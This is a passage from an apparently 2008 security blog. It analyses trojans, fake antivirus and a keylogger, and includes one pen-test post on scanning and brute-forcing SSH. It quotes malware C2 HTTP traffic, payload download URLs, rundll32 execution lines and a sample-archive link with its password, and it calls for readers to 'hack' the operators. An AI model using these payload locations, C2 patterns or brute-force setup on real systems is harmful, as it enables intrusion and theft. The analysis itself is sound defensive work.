/>VirtualAllocEx<br />kernel32.dll<br />WriteProcessMemory<br />kernel32.dll<br />GetThreadContext<br />kernel32.dll<br />SetThreadContext<br />kernel32.dll<br />ResumeThread<br /><br />This shows us this was not written by simple kids! this is a professional code injection using thread contexts, this teaches us that the guys "on the wild" have learned beyond besides CreateRemoteThread!!!<br /><br />It seems that this version relates to: burimilol.com which is unknown to "norton safe web" (yeah right): https://safeweb.norton.com/report/show?name=burimilol.com but it's older variant is known "burimilol.net": https://safeweb.norton.com/report/show?name=burimilol.net<br />What separates us from the criminals is the "protected domain services" which is mostly used by criminals...again no internet cops :)<br /><br />Now it executes itself! parses its duplicate's PE and sections and injects code into it!<br />Then it dumps a hidden exe in %windir%(c:\windows) called fxstaller.exe(48kb) which this time has a jpg icon in both the 32x32 and the 16x16 :)<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SRt54ibNVJI/AAAAAAAAAD8/BJnFLGeQzTI/s1600-h/avs3fxinstaller.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 246px; height: 400px;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SRt54ibNVJI/AAAAAAAAAD8/BJnFLGeQzTI/s400/avs3fxinstaller.JPG" alt="" id="BLOGGER_PHOTO_ID_5267938201360487570" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />This exe drops/downloads image.exe(48kb) in a new temp folder in %temp%<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SRt6MKmDvJI/AAAAAAAAAEE/bQfjBhbyKzQ/s1600-h/avs4image.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 245px; height: 400px;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SRt6MKmDvJI/AAAAAAAAAEE/bQfjBhbyKzQ/s400/avs4image.JPG" alt="" id="BLOGGER_PHOTO_ID_5267938538560928914" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />This results are crippy!!! i guess Dr.Web also failed and there is no one left to trust but Microsoft!<br />Then service.exe(144kb) is dropped at %windir$\system32\service.exe, a hidden file with a darth vader icon :)<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_18YBLFP2tdA/SRt6mZr8oUI/AAAAAAAAAEM/cW2HwYDyiQ4/s1600-h/avs5service.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 246px; height: 400px;" src="http://3.bp.blogspot.com/_18YBLFP2tdA/SRt6mZr8oUI/AAAAAAAAAEM/cW2HwYDyiQ4/s400/avs5service.JPG" alt="" id="BLOGGER_PHOTO_ID_5267938989288759618" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />This exe of darkness downloads and executes a file to c:\msn.exe<br /><br /><br />Now some deeper information, for the researchers among us. Why their url is not blocked?! because they are tricky!!!<br />They "try" do download http://www.freewebtown.com/tatrusa/test2.jpg which redirects to<br />http://fwt.txdnl.com/6-40/t/a/tatrusa/test2.jpg<br />Then it requests<br />GET /cn?sid=40545F5A4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D542F5C2B282F2D5A5C5A2D5E2C5D5A5B282B2B5E582C5F5151592D2C515D2A5A5A4F081D544F131854594F1D1954594F080F0F000D54585F515D51504F04061B1901000D5408075B0E4F1B0C1F000D54505C505B692901 HTTP/1.1<br />User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)<br />Host: 85.17.166.233<br /><br />And gets<br /><br />HTTP/1.1 200 OK<br />Date: Thu, 13 Nov 2008 00:04:56 GMT<br />Server: Apache/2.0.61 (FreeBSD) PHP/5.2.3 with Suhosin-Patch mod_fastcgi/2.4.2<br />Set-Cookie: sid=EE1DDFD5947B45F595556BD6D7E9C1A7; expires=Sat, 07-Nov-2009 19:04:56 GMT<br /><br />g_InstallDll: http://77.93.75.153/img/upd.dll<br />Content-Length: 127<br />Connection: close<br />Content-Type: text/html<br /><br />34034a4615431643424540474651151e4a4640445116034a354344403134363435464641464633333543454346414f434f4e3431313131315104114a047743<br /><br />Then it sends stuff about me, to get the commands for this cool trojan!<br /><br />POST / HTTP/1.1<br />g_Version: 1156<br />g_ClientGUID: ,`Xc,q!`!q-Kk!JcXX-yK9NNGqKNk=!!<br />g_UID: Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,<br />g_SetID: [QJx<br />g_AffiliateID: y9NkNh<br />g_ResourceID: MnOM<br />g_URL: 8<br /><br />g_Client: .Sf"yhJ:y9N:y!y:9` %?[H[Q]F:FBxFf@8/FQ"`:y:J9GGg)O?BFVO S[VE Ji8.K"-:G:`-!G:y!8vR"^yJG8Z}V"|OW?Om8*) uOxFfUO?On U}" =?}m8rc="GG^G!^aa^NG^`9^Gk8*K [VV}]QUf"0S*S!p[IO"f[n[f)rvSp[IO"f[n[fb8 =?}m86Wn"GGGGGkGh>#GGGGGkGq8p]IWO? }a H?}VOff}?f" y8.f_fO?cnIFQ" 1Of8o)]VV=}QQ"QOBO?o=}QQ"QOBO?o=}QQp]I"Go,FAO" ="z/.pq*/)zf~fUOI!JzQQQAPFF.:nAAo.QF fFMO" !kkoqOaX?}mfO?"D="zS?}x?[I ,FAOfz.QUO?QOU KYHA}?O?z.KeSZ*uK:KeKD ^Q}'}IOoqOfEU}H)~fUOI"qOfEU}Ho<br />g_GZipSupported: U?]O<br />g_RevID: h9J-<br />g_First: y<br />User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)<br />Host: bescoro.com<br />Content-Length: 37<br />Cache-Control: no-cache<br /><br />)vcv.)v.=) 0%nDDn@%r}MFAA[|FfU}?~" @b<br /><br />And gets:<br />HTTP/1.1 200 Ok<br />Server: nginx/0.5.35<br />Date: Thu, 13 Nov 2008 00:05:26 GMT<br />Content-Type: text/html; charset=iso-8859-1<br />Connection: close<br />Pragma: No-cache<br />Expires: Mon, 26 Jul 1997 05:00:00 GMT<br />Content-Length: 219<br />Content-Language: en<br />Set-Cookie: uid=Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,; expires=Mon, 09-Dec-2007 13:46:00 GMT<br />Set-Cookie: guid=,`Xc,q!`!q-Kk!JcXX-yK9NNGqKNk=!!; expires=Mon, 09-Dec-2007 13:46:00 GMT<br />Set-Cookie: cn=y; expires=Mon, 09-Dec-2007 13:46:00 GMT<br />Location:<br />Test: [B[FA<br />g_AdCategory: )}IO<br />g_ConnectionPerDay: k<br />g_MaxCategoryAppearances:<br />g_Popup: U?]O<br />g_PopupPerDay: yGy<br />g_RSD: 'UUH"88}WFOWO:V}I8x}88o'UUH"88nO?}]fUF:V}I8x}88o<br />g_RedirectServers: 'UUH"88NJ:hN:J!`:!`8x}88o'UUH"88N`:y-:y99:y-G8x}88o'UUH"88N!:ykh:yy`:ykN8x}88o<br />g_RevFlag: G<br />g_ServerIPs: gWOfV}?}:V}I"NGigNh:yNN:y9:!9"NGigN!:ykh:yy`:yk-"NGi<br />g_SetIDWas: _Q?OAO[fOn<br />g_StatisticsUploadDelay: y<br />g_StealFocus: a[AfO<br />g_UID: Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,<br />g_URL: 8<br /><br />Y.r.r..G.....=......Q..|$u..kM.+`.......u..-.L..7...7{G.<br />.w.=.(r...%.......u........NsGD.a.2...g.d....I.6..:T.............R.L_......$6.G.......RZeZ><br />+=/~..`Y. ........B........X<br />..'.a.b..7...O>n.i..Y.._9_%.<br />...qre../.p.<br /><br />Then it "trys" to download http://www.freewebtown.com/tatrusa/oos.jpg and again redirected to: http://fwt.txdnl.com/6-40/t/a/tatrusa/oos.jpg<br />Then it downloads http://www.j2arts.com/images/msn.exe to c:\msn.exe<br />From here it looks like it is the same old tech viruses (keyloggers and the classics, i don't have time for these files.....):<br />rundll32.exe C:\WINDOWS\system32\vtUolLBS.dll,a (vtUolLBS == random name)<br />rundll32.exe C:\WINDOWS\system32\nnnljiiI.dll,c<br />rundll32.exe C:\WINDOWS\system32\iifgHbyY.dll,a<br /><br />So let's summarize!<br /><br /><span style="font-weight: bold;">Evil hosts:</span><br />burimilol.net<br />burimilol.com<br />www.j2arts.com<br />www.freewebtown.com<br />fwt.txdnl.com<br />bescoro.com<br />77.93.75.153<br />85.17.166.233<br /><br />The AV vendors should receive my scanned files from virustotal.<br />I will also make an exception on this one and upload a sample for all the involved executable!<br />http://www.linkstofiles.com/MSNWorm.rar<br />archive password: "virus"<br /><br />Stop them, sue them, black list them, hack them, they are stealing from all of us!<br />Fight for digital law enforcement!!!Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com1tag:blogger.com,1999:blog-9114770521689436630.post-40260632498362294132008-10-28T01:05:00.000-07:002008-10-28T01:08:00.638-07:00Pen-Tests in 2008 and Why don't you crack ssh?I made a pen-test lately to a medium size American firm and it seems public remote exploits for devices such as Juniper, Netopia, Cisco (telnet) and default Linux services has gone to as low as one or two for each since 2004.<br /><br />Since any respectable firm has windows update turned on and the Fedora style Linux distribution also has automatic updates, I got to the conclusion that the cycle of:<br />Safe --> Research --> Exploit --> Public Disclosure --> Patch --> Automatic Update --> Safe<br />results that Black-Box Penetration Testers don't have much to show the client except for configuration errors and a few user enumerations and less critical stuff that don’t get fixed by the vendors.<br /><br />The solution for that would be that pen-testers will find their own exploits. That is why in the last years most of the written tools are fuzzers.<br />Cisco, Netopia, Juniper and Linux services were already fuzzed as hell before they were shipped to clients so this doesn't seem to be a good approach to the problem.<br /><br />My suggestions:<br />1) if you are a pen-tester, research and discover your own vulnerabilities and create workarounds for them, show it to your client and keep it to yourself!<br />2) If you are a researcher, supply a working P.O.C because the pen-testers doesn't have time to buy that machine and develop a working shellcode to work with your vulnerability<br /><br /><span style="font-weight: bold; text-decoration: underline;color:red;" >Being 13 hops away from the machines I had been pen-testing</span> I was amazed to see that products which are extremely mainstream and trusted fail for such a simple task.<br />I used Nmap to scan the network range (of course with -P0 or -PN in the new version) and just two HTTP servers were discovered from 8 hosts, as I am not a big fan of Nmap I returned to what I was using in the past GFI Languard.<br /><br />I scanned the targets using GFI Languard (which is a great tool when used inside local networks) and I set complete TCP and UDP ports scan with 20 seconds TCP timeout and 8 seconds UDP timeout, this timeouts are EXTREME and should achieve the most accurate results. The scan results were very poor, detecting about 3 open ports on 8 machines!!! Of course I checked nothing else is running on my internet connection to make sure this was just a bad dream. I scanned again and one more port was discovered, SSH!<br /><br />I decided this cannot be true and I returned to Nmap using the "slow and Intensive" scan and the results were better, about 5 TCP ports and 1 SNMP, I thought “still no way that is all they got!”<br /><br />Finally, I installed the latest version of Nessus (Tenable Nessus 3), configured it to be with high timeouts and ran the scan. The results were AMAZING!!! It didn't miss any of what the other scanners have found and he discovered 15 more UDP ports and 7 more TCP ports. From now on, I am only scanning with Nessus, my time is worth it!<br /><br />Now that I had some interesting services to attack, I wanted to try and log into one of the Linux machines using SSH. To me it sounds simple, "I will download a dictionary/brute force SSH tool and that's it". Apparently not!<br />There is an ancient perl script running all across the web to do SSH and "expect” THAT-IS-LAME. Some guy really agreed about that and wrote a ruby script to use the lib NET::SSH and automate attempts, quite similar to Tim's SShatter perl script, that is nice but still no multithreading supported.<br />Of course you may think "Why not use T.H.C Hydra?", the answer would be because by default it’s not configured to be compiled with LIBSSH and you got to get some libs, you will burn a few hours to make it work!<br /><br />My dear friend "Kiril Nesenko" AKA "axi1es" wrote for YOU guys the script for "The Common Lazy Fedora Guy" which will download hydra, the SSH and other libs, will configure and compile it and will execute the Hydra all automatically, enjoy! :)<br /><a href="http://www.linkstofiles.com/install_hydra-5.4-src+ssh.sh">http://www.linkstofiles.com/install_hydra-5.4-src+ssh.sh</a>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com1tag:blogger.com,1999:blog-9114770521689436630.post-27169946153904863222008-09-15T09:57:00.000-07:002008-09-15T15:09:56.841-07:00Automated spreading of malware through vBulletin forums<a rel="nofollow" class="bigusername" href="http://www.httpshare.net/members/hakan_72_123.html"></a>Where would it be better to attack then where all the people trust each other?<br />A single individual or a group of individuals of which tracks lead to turkish people and chinese hosting or chinese partners is spreading viruses though infected files and setup installations shared in vBulletin forums. It seems these individuals have a registration bot with captcha bypass mechanism for vBulletin 3.7.xx versions (may be other versions too) and they are using it to spread all kinds of malware.<br /><br />I first found this when examining another Kaspersky 2009 installation located at:<br />http://www.httpshare.net/%E4%E5%F8%E3%E5%FA-%FA%E5%EB%F0%E5%FA-%7C-software-download/427522-kaspersky-antivirus-2009-full-34-p-ece-test-key-no-problem.html<br /><br />The username spreading this message is "hakan_72_123" and with a simple google search we can see:<br />http://www.google.com/search?hl=en&amp;client=firefox-a&amp;rls=org.mozilla%3Ahe%3Aofficial&amp;hs=sgc&amp;q=hakan_72_123&amp;btnG=Search<br /><br />Hakan is not very shy to use the bot with his own name, go figure maby he is infecting thousands of forums manually?!<br />Anyway he in www.vbhackers.com/members/hakan_72_123/ which explains a lot :)<br /><br />So what did he do? he took the time to upload Kaspersky 2009 to<br />http://rapidshare.com/files/115362254/Kaspersky_2009_Full_Sueruem_by_hakan.rar<br /><br />Well I just checked and it has been 2 month since I found it and the bad guy extended the business for torrents too, this is the same virus under the title "Kaspersky Antivirus 2009 Full + Key [App][www.zonatorrent.com] ":<br />http://isohunt.com/download/44622492/kaspersky.torrent<br /><br />Inside the rar there is a txt file with the text:<br /><blockquote>1- program demo deðil full sürümdür.<br /><br />2- key girmek için þu sýrayý takip et<br />license-merge-activate using key-brovse= buradan keyleri<br />çýkarttýðýn klasörü seçip listenin en altýndakin üzerine çýft týklayýp<br />keyi gir.<br /><br /> HAZIRLAYAN: Hakan<br /><br /> www.avrasyaforum.net</blockquote>What they did is instead of the standard shared .msi file, they put a WinRAR self-extracting archive with an icon of an msi file. They made the archive so that WinRar's shell extension doesn't recognize it as extractable. Once executed it drops a file called svchost.exe in "%ProgramFiles%\Outlook Express\" which is a refreshing path to drop a trojan downloader in :)<br />It executes the svchost.exe (compressed with MiniPE) which then executes<br />the trojan downloaded to %temp%\wmoptimizer.dll using rundll32.exe:<br /><blockquote>rundll32.exe "%temp%\wmoptimizer.dll", RunSetup_Install</blockquote>svchost.exe uses the classic URLDownloadToFileW and ShellExecuteW to download and execute: http://loansquotesinsurance.com/f/Resident.bin<br /><br />These is the whois information for http://loansquotesinsurance.com:<span></span><blockquote><span>Registration Service Provided By: Chinese DQ Network Tech Corp.<br />Contact: xixipai@hotmail.com<br /> <br />Domain name: loansquotesinsurance.com<br /><br />Registrant Contact:<br /> Shawn Lee<br /> Shawn Lee<br /> <br /> B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr<br /> Guang Zhou, Guangdong 510660<br /> CN<br /><br />Administrative Contact:<br /> Shawn Lee<br /> Shawn Lee (webmasters@loansquotesinsurance.com)<br /> +86.02033875805<br /> Fax: +86.02033875805<br /> B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr<br /> Guang Zhou, Guangdong 510660<br /> CN<br /><br />Technical Contact:<br /> Shawn Lee<br /> Shawn Lee (webmasters@loansquotesinsurance.com)<br /> +86.02033875805<br /> Fax: +86.02033875805<br /> B-902,Zhongxing Huayuan,No.1102,Zhongshan Dadao,Tianhe Distr<br /> Guang Zhou, Guangdong 510660<br /> CN</span></blockquote><span>The email xixipai@hotmail.com also registers "http://3290.com"<br /><br /><blockquote>Registration Service Provided By: Chinese DQ Network Tech Corp.<br />Contact: xixipai@hotmail.com<br /><br />Domain name: 3290.com<br /><br />Administrative Contact:<br /> Chinese DQ Network Tech Corp.<br /> Ren XiaoFeng (xixipai@hotmail.com)<br /> +1.05306260800<br /> Fax: +299.05306260803<br /> ZhongHuaDonglu 1038hao<br /> HeZe, 274000<br /> CN<br /><br />Technical Contact:<br /> Chinese DQ Network Tech Corp.<br /> Ren XiaoFeng (xixipai@hotmail.com)<br /> +1.05306260800<br /> Fax: +299.05306260803<br /> ZhongHuaDonglu 1038hao<br /> HeZe, 274000<br /> CN<br /><br />Registrant Contact:<br /> Chinese DQ Network Tech Corp.<br /> Ren XiaoFeng<br /> <br /> ZhongHuaDonglu 1038hao<br /> HeZe, 274000<br /> CN</blockquote>Well this is the part where I can only say, if you are reading this and in some kind of cyber police, DO SOMETHING!!!<br /></span>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com1tag:blogger.com,1999:blog-9114770521689436630.post-52736687928304803252008-09-15T07:55:00.000-07:002008-09-15T15:17:23.085-07:00Keylogger Running Under Kaspersky 2009The last posts clearly show It is well known that static virus detection is not something AV vendors do well enough. Now this one is quite a story. As I was researching many trojans I was moving files into and out of my Virtual PC machine used to test viruses. My computer has kaspersky 2009 installed and running with maximum security settings (including keyloggers and kernel object modifications).<br /><br />I accidently executed without noticing on my host PC one of the samples I was testing in the VM. I was using my computer as usual and I began noticing some kind of tiny delays when typing a lot of text, the kind of delays I was experiencing when I first wrote my first keylogger. I was completely suprised to have this suspicous since I felt "almost safe" with my updating every 4 hours Kaspersky 2009.<br /><br />Opening "Process Explorer" I began examining the running processes and noticed some wiered dll files running in all my processes.<br />kbdth2sys.dll<br />kbdvntcapi.dll<br />They were in system32 and these are the AV test results for these 2 files day (also 2 month ago):<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5-WlnWv-I/AAAAAAAAACM/VoW5Pielgwg/s1600-h/anaylsispic.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5-WlnWv-I/AAAAAAAAACM/VoW5Pielgwg/s400/anaylsispic.JPG" alt="" id="BLOGGER_PHOTO_ID_5246269542452608994" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />I was surprised by two things:<br />1) Kaspersky Anti-Keylogger "live protection" compromised all my personal information<br />2) Symantec was the only AV really detecting this and as a keylogger, which is very funny because their AV is a joke, I will send a few posts about that later<br /><br />I can't believe this! I am now uploading the files again to virustotal to see the updated scan results for today and i notice this:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SM6BEBydL6I/AAAAAAAAACU/9F2VQeHLDoA/s1600-h/getthis.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SM6BEBydL6I/AAAAAAAAACU/9F2VQeHLDoA/s400/getthis.JPG" alt="" id="BLOGGER_PHOTO_ID_5246272522132729762" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />The file was first received by virustotal in 2007.10.23 which is almost 2 years ago!!!!!!!!!<br />This only prooves us 3 things:<br />1) The malicous code writers WERE INDEED using virustotal's "don't distribute samples to AV vendors" which was lately removed!<br />2) All Anti-Viruses didn't detect this wide spread keylogger which is used to steal peoples information for THE LAST TWO YEARS!!!<br />3) Its better to write keyloggers in Delphi ;)<br /><br />I here by thank the creator of the matrix for letting me find it on my PC after just 2 days.<br />Here are today's result for <span id="status_nombre">kbdth2sys.dll</span>:<br />http://www.virustotal.com/en/analisis/ae172aaf34a59733d149476e4b4bcb9c<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SM6FAnZlVnI/AAAAAAAAACc/Sk1ffWMKjIY/s1600-h/today.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_18YBLFP2tdA/SM6FAnZlVnI/AAAAAAAAACc/Sk1ffWMKjIY/s400/today.JPG" alt="" id="BLOGGER_PHOTO_ID_5246276861555988082" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />So after 2 YEARS it has been undetected and 2 MONTH after the AV vendors got my uploaded samples we get this amazing 10 of 36 result which leaves it undetected for: Kaspersky, DrWeb, McAfee, BitDefender, Microsoft, Panda, F-Secure, Fortinet and others...<br /><br />As for <span id="status_nombre">kbdvntcapi.dll after all this, detection hasn't really changed, 4 huristic decetions and 1 symantec keylogger detection, still a sad story (at least for most people :)</span><br />http://www.virustotal.com/he/analisis/d51626cb8f0b04219b0ad4c010036f0d<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SM6JGawvskI/AAAAAAAAACk/3mgCAcDx3dg/s1600-h/capi.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SM6JGawvskI/AAAAAAAAACk/3mgCAcDx3dg/s400/capi.JPG" alt="" id="BLOGGER_PHOTO_ID_5246281359289201218" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Well, I uninstalled my kaspersky 2009 :)Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-56196429228842390432008-09-15T06:58:00.000-07:002008-09-15T07:54:44.041-07:00AVs fail AgainLately I have seen many web downloads, some at forums and some at rapidshare and also a few torrents such as "Adobe Acrobat 9" that include installation and a crack.<br />The installation or crack is in a password protected rar file that in order to get the password, one must run the supplyed tool called "XXX Password Generator".<br /><br />This installs another variant of the AntiVirus 2008, I can truely say I can't tell anymore if it comes from the same guys, ok of course it's them but there is just no way they got so much man power to write so many completely different versions!!!<br />Here are the websites it pops up to purchase from:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5xR1RZj9I/AAAAAAAAABs/whxN6pF9AKE/s1600-h/1.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5xR1RZj9I/AAAAAAAAABs/whxN6pF9AKE/s400/1.JPG" alt="" id="BLOGGER_PHOTO_ID_5246255167104978898" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_18YBLFP2tdA/SM5xSAkHmYI/AAAAAAAAAB0/D6jgyAVQCT8/s1600-h/2.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_18YBLFP2tdA/SM5xSAkHmYI/AAAAAAAAAB0/D6jgyAVQCT8/s400/2.JPG" alt="" id="BLOGGER_PHOTO_ID_5246255170136283522" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SM5xSSSUjOI/AAAAAAAAAB8/nm5noC3lhbM/s1600-h/3.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SM5xSSSUjOI/AAAAAAAAAB8/nm5noC3lhbM/s400/3.JPG" alt="" id="BLOGGER_PHOTO_ID_5246255174893472994" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5xSR6btGI/AAAAAAAAACE/sgHv3tKwF1U/s1600-h/screenshot4.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SM5xSR6btGI/AAAAAAAAACE/sgHv3tKwF1U/s400/screenshot4.JPG" alt="" id="BLOGGER_PHOTO_ID_5246255174793278562" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />Installs executables at:<br />%ProgramFiles%\Antivirus 2008\Antivirus-2008.exe<br />which is today detected by 24 of 36 AV vendors<br />http://www.virustotal.com/en/analisis/5ca67e83d763a44d2719de3c40ab0086<br /><br />This virus adds a scary DANGER! iframe to your desktop.htt, who would remove this for you? <blockquote><\div style="position: absolute; left: 0pt; top: 0pt; width: 1280px; height: 836px;"><br /><\img src="file:///C:/WINDOWS/web/wallpaper/Bliss.bmp" cache="" style="position: absolute; left: 0pt; top: 0pt; width: 100%; height: 100%;" /><br /><br /><\iframe id="1" marginwidth="0" marginheight="0" name="DeskMovrW" src="file:///C:%5CWINDOWS%5Cprivacy_danger%5Cindex.htm" resizeable="XY" subscribed_url="" style="background: transparent none repeat scroll 0% 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; position: absolute; left: 0pt; top: 0pt; width: 1280px; height: 806px; z-index: 0;" frameborder="0"> </blockquote>It installed some dlls and executables which are very known to AVs:<br />http://www.virustotal.com/en/analisis/3ed55959b67a666973798fa0c35f23f5<br />http://www.virustotal.com/en/analisis/c44ccd7ef6b11f700a52042bdb09057f<br />http://www.virustotal.com/en/analisis/ee13a4586807956432b3989534febf60<br />http://www.virustotal.com/en/analisis/2af01563b34916780ac23799ec1368df<br />http://www.virustotal.com/en/analisis/0e309871a713b62a6e68a0071ac54b06<br />http://www.virustotal.com/en/analisis/1f5371eb356e9c893c3dbec8b496641b<br />http://www.virustotal.com/en/analisis/0d012def38cd3adfe5ada8d7c45b3041<br />http://www.virustotal.com/en/analisis/0d9eacd2a5c15fb03a91f2b044000bc3<br />http://www.virustotal.com/en/analisis/bbef207525a04ba4152509a1e458d1e4<br /><br />There is as another variant I found called "AntiMalwareGuard_Free.exe" packed with PECompact 2.xx, this is considered detected relatevly to the other variants 19 of 36 AV vendors detect it.<br />http://www.virustotal.com/en/analisis/c0b7c0498a9b0f684f9e3cbbcc0e5b53<br /><br />So where is the problem???<br /><span style="font-weight: bold;">The Troajn Downloader it self wasn't detected by any vendor and now 2 month after</span> I found it (which means<span style="font-weight: bold;"> the vendors got the samples from my virustotal file upload</span> 2 month ago), now it is detected by only 15 AV vendors!!!<br />http://www.virustotal.com/he/analisis/a38ab04057b44c6bd870ef0446a19a5e<br /><span style="font-weight: bold;">Kaspersky! McAfee! TrendMicro! Panda! F-Secure! Fortinet! Where are you people?!?!?!?!</span><br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">The malicious guys have no problem replacing the executables at the server side to avoid detection, they even have the man power to write completely new ones.</span></span>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-63509457270449276772008-09-15T05:28:00.001-07:002008-09-17T06:11:26.262-07:00Google fooled by the "Fake Anti-Virus Virus"You probably know by now about the fake Anti-Virus that is planted everywhere to fool people into buying it, go figure maby it will self update some day and will start stealing bank accounts...<br />I can't believe we have come to this to point where it is so spread and has so much different domains and versions and nobody stops them!!!<br />The internet needs some kind of global FBI to keep control over these criminals!!!<br />These guys operate from Russia and they are the "180 Solutions" team (i proove it below) which shows everyone that a criminal business in the internet is profitable and grows over the last 5 years, at least if its running from a country safe for cyber criminals (Russia!!!)<br /><br />These is a wide viral network and they check for existance of any of their products, I saved the list of internet explorer blocked/trusted they look here: http://theinsider.deep-ice.com/evilnetwork.txt<br /><br />So they infect us through cracks and software installations (fake setups, SFX, exe binding) and p2p (torrent, emule) and of course OS and browser exploits through warez websites.<br />Still, something is missing... it's working too well this time! well get this!!<br /><br />Please join my experiment, let's assume someone just opends google and wants to download the mp3 of the Sopranos T.V series titled "you got yourself a gun", so he should search "download mp3 sopranos got yourself a gun", you can test it yourself:<br /><br />http://www.google.com/search?hl=iw&amp;client=firefox-a&amp;rls=org.mozilla%3Ahe%3Aofficial&amp;hs=X1V&amp;q=download+mp3+sopranos+got+yourself+a+gun&amp;btnG=%D7%97%D7%99%D7%A4%D7%95%D7%A9&amp;meta=<br /><br />Last week result number three was:<br /><blockquote>Sopranos Theme Song<br />You woke up this morning Got yourself a gun, Complete Guide to Entertaining - Sopranos Stile! Entertaining with The Sopranos May 25, 2008 Download Sopranos ...<br />www.geocities.com/owhfmqhoqxu/sopranos-theme-song.html - 13k</blockquote><br />Now result number six is :<br /><blockquote>mas woemns rights woems woemsn bottle opener woen woen am woen of ...<br />... up this morning got yourself a woke up this morning got yourself a gun woke ... sopranos woke up this morning mp3 woke up this morning mp3 sopranos woke ...<br />http://hauton.net/2/2289/ - 35k</blockquote>One can clearly see that last week result is very very convincing and the new one is also similar to a way a warez/mp3 website would appear in google, this leads directly to a page with auto download offering of this fraud virus.<br /><br />1) Why isn't this blocked by google who "maps all the evil pages in the world"?!<br />2) Google search engine is helping the bad guys to publish their virus in the top 10 results!<br /><br />This issue goes way byhond searching for downloads, I even got it seaching people:<br 